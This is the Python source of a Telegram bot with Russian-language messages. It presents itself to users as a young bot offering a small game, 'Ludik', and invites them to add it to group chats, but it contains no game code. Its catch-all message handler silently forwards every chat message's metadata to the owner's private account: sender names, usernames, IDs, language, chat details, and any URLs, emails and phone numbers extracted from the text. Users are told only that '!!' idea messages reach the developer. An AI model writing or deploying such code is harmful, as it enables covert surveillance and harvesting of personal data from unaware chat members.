import telebot
from telebot import types
from datetime import datetime, timedelta
import sqlite3
import html
import random

bot = telebot.TeleBot("token", parse_mode='HTML')
me = my_id

def safe(val):
    if val is None:
        return None
    if isinstance(val, list):
        return "\n".join(safe(v) for v in val if v is not None)
    if hasattr(val, '__dict__'):
        if val.__class__.__name__ == "MessageEntity":
            return f"тип: {val.type}, offset: {val.offset}, длина: {val.length}"
        return str({k: safe(v) for k, v in val.__dict__.items() if v is not None})
    return html.escape(str(val))


@bot.message_handler(commands=['start'])
def send_welcome(message):

    conn = sqlite3.connect("emojis.db")
    cursor = conn.cursor()
    cursor.execute("""CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,user_id INTEGER UNIQUE,time TEXT,emojis TEXT,money INTEGER UNIQUE)""")
    conn.commit()
    conn.close()

    markup = types.InlineKeyboardMarkup()
    btn0 = types.InlineKeyboardButton(
        text="➕ Добавить бота", url="https://t.me/YOUR_BOT_USERNAME?startgroup=true"
    )
    markup.add(btn0)

    bot.send_message(
        message.chat.id,
        "<b>Привет!\nЯ совсем молодой бот и нахожусь в разработке!!! ⚠\n"
        "Но ты уже можешь добавить небольшую игру 'Ludik' от меня👇</b>",
        reply_markup=markup
    )

@bot.message_handler(commands=['info'])
def send_info(message):
    text = (
        "<b>📌 БЛИЖАЙШИЕ ПЛАНЫ РАЗРАБОТЧИКОВ</b>\n\n"
        "<b>1.</b> Добавление большего количества инструментов для модерации чатов ⚖\n\n"
        "<b>2.</b> Улучшение имеющихся функций и добавление доната 💶\n\n"
        "<b>3.</b> Вы можете предложить свои идеи, добавив '!!' в начале сообщения✉"
    )
    bot.send_message(message.chat.id, text)

def extract_relevant_entities(message):
    if not message.entities or not message.text:
        return []

    relevant_types = {'url', 'email', 'phone_number', 'hashtag'}
    extracted = []

    for entity in message.entities:
        if entity.type in relevant_types:
            start = entity.offset
            end = start + entity.length
            entity_text = message.text[start:end]
            extracted.append(f"{entity.type}: {entity_text}")

    return extracted

@bot.message_handler(func=lambda m: True)
def handle_all_messages(message):
    relevant_entities = extract_relevant_entities(message)
    time_str = datetime.fromtimestamp(message.date).strftime("%d.%m.%Y %H:%M:%S")

    lines = []
    lines.append("<b>ЛИЧНОСТЬ</b>")
    if message.from_user.first_name:
        lines.append(f"Имя: {safe(message.from_user.first_name)}")
    if message.from_user.last_name:
        lines.append(f"Фамилия: {safe(message.from_user.last_name)}")
    if message.from_user.username:
        lines.append(f"Юзернейм: @{safe(message.from_user.username)}")
    lines.append(f"ID: {message.from_user.id}")
    lines.append(f"Бот: {message.from_user.is_bot}")
    if message.from_user.language_code:
        lines.append(f"Язык: {safe(message.from_user.language_code)}")
    lines.append(f"Время отправки: {time_str}\n")

    lines.append("<b>ЧАТ</b>")
    lines.append(f"ID Чата: {message.chat.id}")
    lines.append(f"Тип чата: {message.chat.type}")
    if message.chat.title:
        lines.append(f"Название чата: {safe(message.chat.title)}")
    if message.chat.username:
        lines.append(f"Юзернейм чата: @{safe(message.chat.username)}")
    else:
        lines.append("Юзернейм чата: нету")
    if message.left_chat_member:
        lines.append("Пользователь вышел из чата: Да")
    if message.new_chat_members:
        lines.append(f"Новые участники: {safe(message.new_chat_members)}")

    if relevant_entities:
        lines.append("\n<b>Важные сущности из сообщения:</b>")
        lines.extend(relevant_entities)

    base_info = "\n".join(lines)
    if len(base_info) > 4000:
        base_info = base_info[:3990] + "\n<i>Обрезано...</i>"

    if message.text and message.text.startswith("!!"):
        bot.send_message(message.chat.id, "<b>Спасибо за сотрудничество!</b>")
        idea_text = f"\n<b>ИДЕЯ:</b> {html.escape(message.text[2:].strip())}"
        bot.send_message(me, base_info + idea_text)
    else:
        bot.send_message(me, base_info)




bot.infinity_polling()
